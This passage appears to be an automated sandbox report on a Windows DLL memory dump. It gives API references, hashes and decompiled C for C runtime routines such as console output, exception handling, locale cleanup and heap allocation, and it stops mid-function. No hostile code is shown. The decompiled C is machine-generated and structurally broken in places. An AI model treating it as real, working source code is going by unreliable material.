0x00000000
0x6d4ce871
0x6d4ce727
0x6d4ce71c
0x6d4ce711
0x6d4ce6ca
0x6d4ce6ca
0x6d4ce6cc
0x6d4ce6ce
0x6d4ce6cf
0x6d4ce6d0
0x6d4ce6d1
0x6d4ce6d6
0x6d4ce961
0x6d4ce965
0x6d4ce966
0x6d4ce971
0x6d4ce971
0x6d4ce6c8
0x00000000

APIs

Part of subcall function 6D4CF26D: RtlAllocateHeap.NTDLL(00000000,6D4875D9,00000000,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9,00000004,00000000,00000000,00000000), ref: 6D4CF29F

_free.LIBCMT ref: 6D4CE611
_free.LIBCMT ref: 6D4CE628
_free.LIBCMT ref: 6D4CE647
_free.LIBCMT ref: 6D4CE662
_free.LIBCMT ref: 6D4CE679

Strings

Om, xrefs: 6D4CE559

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: Om
API String ID: 3033488037-1734728714
Opcode ID: d91ec95303759a35650b7a0d683584a6c784a31b45012456514d1014fffd042e
Instruction ID: 598d6be93065730bfe19535e3cd551f4539f1ce0e398996eff9523741bf1c282
Opcode Fuzzy Hash: d91ec95303759a35650b7a0d683584a6c784a31b45012456514d1014fffd042e
Instruction Fuzzy Hash: 3A51AC3AA14205ABDB11CF69C882F6AB7F5EF49724F54056DE909DB250E731EE01CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D2C2B, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D4D2C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x6d54506c; // 0xff2bc58a
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6d5476f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6d5476f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6D4C367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6d5476f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6d5476f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6d5476f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6D4CCF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6D4CCF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6D49F8A5(_v8 ^ _t133, _t129, _t132);
			}

APIs

GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6D4D33A0,?,?,00000000,?,?,?), ref: 6D4D2C6D
__fassign.LIBCMT ref: 6D4D2CE8
__fassign.LIBCMT ref: 6D4D2D03
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6D4D2D29
WriteFile.KERNEL32(?,00000000,00000000,6D4D33A0,00000000,?,?,?,?,?,?,?,?,?,6D4D33A0,?), ref: 6D4D2D48
WriteFile.KERNEL32(?,?,00000001,6D4D33A0,00000000,?,?,?,?,?,?,?,?,?,6D4D33A0,?), ref: 6D4D2D81

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: d73e12ebff1f96b96cefd408ea7f4ed25ea31393bda78beb80098c527899b94c
Instruction ID: fd599b62664f49bf0891d8e92750c17d4e2e2a4ad06f9c9984ebfb6a2b1faebf
Opcode Fuzzy Hash: d73e12ebff1f96b96cefd408ea7f4ed25ea31393bda78beb80098c527899b94c
Instruction Fuzzy Hash: 5B5180B1A012499FDB10CFA8C891FEEBBB8EF09310F15415AE965E7281DB30DD51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A3F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E6D4A3F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6d54506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6D4A3F20(_t74, __edx);
				E6D4A5267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6D4A5920(_t74, 0xfffffffe, _t93, 0x6d54506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6D4A58D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6D4A3F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6d4ee698;
											if(__eflags != 0) {
												_t70 = E6D4E7400(__eflags, 0x6d4ee698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6d4ee698; // 0x6d4a3b1a
													 *0x6d4ea26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6D4A5904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6D4A5920(_t63, _t90, _t93, 0x6d54506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6D4A3F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6D4A58E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6D4C2281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = RtlAllocateHeap( *0x6d547b04, 0, _t95); // executed
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6D4DBEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6D4C9256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 6D4A3F8B
___except_validate_context_record.LIBVCRUNTIME ref: 6D4A3F93
_ValidateLocalCookies.LIBCMT ref: 6D4A4021
__IsNonwritableInCurrentImage.LIBCMT ref: 6D4A404C
_ValidateLocalCookies.LIBCMT ref: 6D4A40A1

Strings

csm, xrefs: 6D4A4036

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 6752ca5eb7207eb4a0be1fe4760b1b0c56764b7baad36cba04619b00eab6e929
Instruction ID: bf2816685033dac0a05439758d341c5dbd6b8bba4f4824cfb0b0bb2120d69599
Opcode Fuzzy Hash: 6752ca5eb7207eb4a0be1fe4760b1b0c56764b7baad36cba04619b00eab6e929
Instruction Fuzzy Hash: F541E734A04219ABCF00DF68C884EAEBBB5BF55368F188159E91C5B359DB31DD05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD29B, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4DD29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6D4DCF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6D4DCF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6D4DCF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6D4DCF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6D4DCF81(_t5, 2);
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6D4DCF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6D4DCF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6D4DCF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6D4DCF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6D4DCF81(_t13, 2);
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6D4CCBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6D4CCBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 6D4DCF81: _free.LIBCMT ref: 6D4DCFAA

_free.LIBCMT ref: 6D4DD2E9

Part of subcall function 6D4CCBD3: HeapFree.KERNEL32(00000000,00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000), ref: 6D4CCBE9
Part of subcall function 6D4CCBD3: GetLastError.KERNEL32(00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000,00000000), ref: 6D4CCBFB

_free.LIBCMT ref: 6D4DD2F4
_free.LIBCMT ref: 6D4DD2FF
_free.LIBCMT ref: 6D4DD353
_free.LIBCMT ref: 6D4DD35E
_free.LIBCMT ref: 6D4DD369
_free.LIBCMT ref: 6D4DD374

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction ID: 61234fe2ed452a17edb790d2b307c8d9e16fb6aaa0761a9f86b1ac6f06adaa05
Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction Fuzzy Hash: 7111B6B1A48B04BAD660E7B0DC15FCBB7AD9F08704F418D1DB39966091EB35BD1447D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48EF91, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48EF91(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t307;
				signed int _t308;
				void* _t320;
				void* _t333;
				void* _t346;
				void* _t359;
				void* _t372;
				void* _t385;
				void* _t398;
				void* _t411;
				void* _t424;
				void* _t437;
				void* _t450;
				void* _t463;
				void* _t476;
				void* _t489;
				void* _t502;
				void* _t515;
				void* _t528;
				void* _t541;
				void* _t554;
				void* _t567;
				signed int _t815;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				void* _t946;

				_t879 = __edx;
				_t668 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t946 - 0x14, 0);
				_t903 =  *0x6d546de4; // 0x0
				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
				 *(_t946 - 0x10) = _t903;
				_t307 = E6D46161C(0x6d546d90);
				_t671 =  *((intOrPtr*)(_t946 + 8));
				_t308 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t307);
				_t881 = _t308;
				if(_t308 != 0) {
					L5:
					E6D4866BA(_t946 - 0x14);
					return E6D4A0075(_t881);
				} else {
					if(_t903 == 0) {
						_push( *((intOrPtr*)(_t946 + 8)));
						_push(_t946 - 0x10);
						__eflags = E6D490D03(__ebx, _t671, __edx, _t881, _t903) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t946 - 0x20);
							E6D4A3D74(_t946 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t881, _t903, 0x14);
							E6D486653(_t946 - 0x14, 0);
							_t904 =  *0x6d546db4; // 0x0
							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
							 *(_t946 - 0x10) = _t904;
							_t320 = E6D46161C(0x6d546d68);
							_t678 =  *((intOrPtr*)(_t946 + 8));
							_t882 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t320);
							__eflags = _t882;
							if(_t882 != 0) {
								L12:
								E6D4866BA(_t946 - 0x14);
								return E6D4A0075(_t882);
							} else {
								__eflags = _t904;
								if(_t904 == 0) {
									_push( *((intOrPtr*)(_t946 + 8)));
									_push(_t946 - 0x10);
									__eflags = E6D490DA5(_t668, _t678, __edx, _t882, _t904) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t946 - 0x20);
										E6D4A3D74(_t946 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t668, _t882, _t904, 0x14);
										E6D486653(_t946 - 0x14, 0);
										_t905 =  *0x6d546dd4; // 0x0
										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
										 *(_t946 - 0x10) = _t905;
										_t333 = E6D46161C(0x6d546b28);
										_t685 =  *((intOrPtr*)(_t946 + 8));
										_t883 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t333);
										__eflags = _t883;
										if(_t883 != 0) {
											L19:
											E6D4866BA(_t946 - 0x14);
											return E6D4A0075(_t883);
										} else {
											__eflags = _t905;
											if(_t905 == 0) {
												_push( *((intOrPtr*)(_t946 + 8)));
												_push(_t946 - 0x10);
												__eflags = E6D490E47(_t668, _t685, __edx, _t883, _t905) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t946 - 0x20);
													E6D4A3D74(_t946 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t668, _t883, _t905, 0x14);
													E6D486653(_t946 - 0x14, 0);
													_t906 =  *0x6d546de8; // 0x0
													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
													 *(_t946 - 0x10) = _t906;
													_t346 = E6D46161C(0x6d546d94);
													_t692 =  *((intOrPtr*)(_t946 + 8));
													_t884 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t346);
													__eflags = _t884;
													if(_t884 != 0) {
														L26:
														E6D4866BA(_t946 - 0x14);
														return E6D4A0075(_t884);
													} else {
														__eflags = _t906;
														if(_t906 == 0) {
															_push( *((intOrPtr*)(_t946 + 8)));
															_push(_t946 - 0x10);
															__eflags = E6D490EB7(_t668, _t692, _t879, _t884, _t906) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t946 - 0x20);
																E6D4A3D74(_t946 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t668, _t884, _t906, 0x14);
																E6D486653(_t946 - 0x14, 0);
																_t907 =  *0x6d546db8; // 0x0
																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																 *(_t946 - 0x10) = _t907;
																_t359 = E6D46161C(0x6d546d6c);
																_t699 =  *((intOrPtr*)(_t946 + 8));
																_t885 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t359);
																__eflags = _t885;
																if(_t885 != 0) {
																	L33:
																	E6D4866BA(_t946 - 0x14);
																	return E6D4A0075(_t885);
																} else {
																	__eflags = _t907;
																	if(_t907 == 0) {
																		_push( *((intOrPtr*)(_t946 + 8)));
																		_push(_t946 - 0x10);
																		__eflags = E6D490F1F(_t668, _t699, _t879, _t885, _t907) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t946 - 0x20);
																			E6D4A3D74(_t946 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t668, _t885, _t907, 0x14);
																			E6D486653(_t946 - 0x14, 0);
																			_t908 =  *0x6d546dec; // 0x0
																			 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																			 *(_t946 - 0x10) = _t908;
																			_t372 = E6D46161C(0x6d546d98);
																			_t706 =  *((intOrPtr*)(_t946 + 8));
																			_t886 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t372);
																			__eflags = _t886;
																			if(_t886 != 0) {
																				L40:
																				E6D4866BA(_t946 - 0x14);
																				return E6D4A0075(_t886);
																			} else {
																				__eflags = _t908;
																				if(_t908 == 0) {
																					_push( *((intOrPtr*)(_t946 + 8)));
																					_push(_t946 - 0x10);
																					__eflags = E6D490F87(_t668, _t706, _t879, _t886, _t908) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t946 - 0x20);
																						E6D4A3D74(_t946 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t668, _t886, _t908, 0x14);
																						E6D486653(_t946 - 0x14, 0);
																						_t909 =  *0x6d546dbc; // 0x0
																						 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																						 *(_t946 - 0x10) = _t909;
																						_t385 = E6D46161C(0x6d546d70);
																						_t713 =  *((intOrPtr*)(_t946 + 8));
																						_t887 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t385);
																						__eflags = _t887;
																						if(_t887 != 0) {
																							L47:
																							E6D4866BA(_t946 - 0x14);
																							return E6D4A0075(_t887);
																						} else {
																							__eflags = _t909;
																							if(_t909 == 0) {
																								_push( *((intOrPtr*)(_t946 + 8)));
																								_push(_t946 - 0x10);
																								__eflags = E6D490FEF(_t668, _t713, _t879, _t887, _t909) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t946 - 0x20);
																									E6D4A3D74(_t946 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t668, _t887, _t909, 0x14);
																									E6D486653(_t946 - 0x14, 0);
																									_t910 =  *0x6d546df0; // 0x0
																									 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																									 *(_t946 - 0x10) = _t910;
																									_t398 = E6D46161C(0x6d546d9c);
																									_t720 =  *((intOrPtr*)(_t946 + 8));
																									_t888 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t398);
																									__eflags = _t888;
																									if(_t888 != 0) {
																										L54:
																										E6D4866BA(_t946 - 0x14);
																										return E6D4A0075(_t888);
																									} else {
																										__eflags = _t910;
																										if(_t910 == 0) {
																											_push( *((intOrPtr*)(_t946 + 8)));
																											_push(_t946 - 0x10);
																											__eflags = E6D491057(_t668, _t720, _t879, _t888, _t910) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t946 - 0x20);
																												E6D4A3D74(_t946 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t668, _t888, _t910, 0x14);
																												E6D486653(_t946 - 0x14, 0);
																												_t911 =  *0x6d546dc0; // 0x0
																												 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																												 *(_t946 - 0x10) = _t911;
																												_t411 = E6D46161C(0x6d546d74);
																												_t727 =  *((intOrPtr*)(_t946 + 8));
																												_t889 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t411);
																												__eflags = _t889;
																												if(_t889 != 0) {
																													L61:
																													E6D4866BA(_t946 - 0x14);
																													return E6D4A0075(_t889);
																												} else {
																													__eflags = _t911;
																													if(_t911 == 0) {
																														_push( *((intOrPtr*)(_t946 + 8)));
																														_push(_t946 - 0x10);
																														__eflags = E6D4910BF(_t668, _t727, _t879, _t889, _t911) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t946 - 0x20);
																															E6D4A3D74(_t946 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t668, _t889, _t911, 0x14);
																															E6D486653(_t946 - 0x14, 0);
																															_t912 =  *0x6d546df8; // 0x0
																															 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																															 *(_t946 - 0x10) = _t912;
																															_t424 = E6D46161C(0x6d546da4);
																															_t734 =  *((intOrPtr*)(_t946 + 8));
																															_t890 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t424);
																															__eflags = _t890;
																															if(_t890 != 0) {
																																L68:
																																E6D4866BA(_t946 - 0x14);
																																return E6D4A0075(_t890);
																															} else {
																																__eflags = _t912;
																																if(_t912 == 0) {
																																	_push( *((intOrPtr*)(_t946 + 8)));
																																	_push(_t946 - 0x10);
																																	__eflags = E6D491127(_t668, _t734, _t879, _t890, _t912) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t946 - 0x20);
																																		E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t668, _t890, _t912, 0x14);
																																		E6D486653(_t946 - 0x14, 0);
																																		_t913 =  *0x6d546df4; // 0x0
																																		 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																		 *(_t946 - 0x10) = _t913;
																																		_t437 = E6D46161C(0x6d546da0);
																																		_t741 =  *((intOrPtr*)(_t946 + 8));
																																		_t891 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t437);
																																		__eflags = _t891;
																																		if(_t891 != 0) {
																																			L75:
																																			E6D4866BA(_t946 - 0x14);
																																			return E6D4A0075(_t891);
																																		} else {
																																			__eflags = _t913;
																																			if(_t913 == 0) {
																																				_push( *((intOrPtr*)(_t946 + 8)));
																																				_push(_t946 - 0x10);
																																				__eflags = E6D4911AB(_t668, _t741, _t879, _t891, _t913) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t946 - 0x20);
																																					E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t668, _t891, _t913, 0x14);
																																					E6D486653(_t946 - 0x14, 0);
																																					_t914 =  *0x6d546dc8; // 0x0
																																					 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																					 *(_t946 - 0x10) = _t914;
																																					_t450 = E6D46161C(0x6d546d7c);
																																					_t748 =  *((intOrPtr*)(_t946 + 8));
																																					_t892 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t450);
																																					__eflags = _t892;
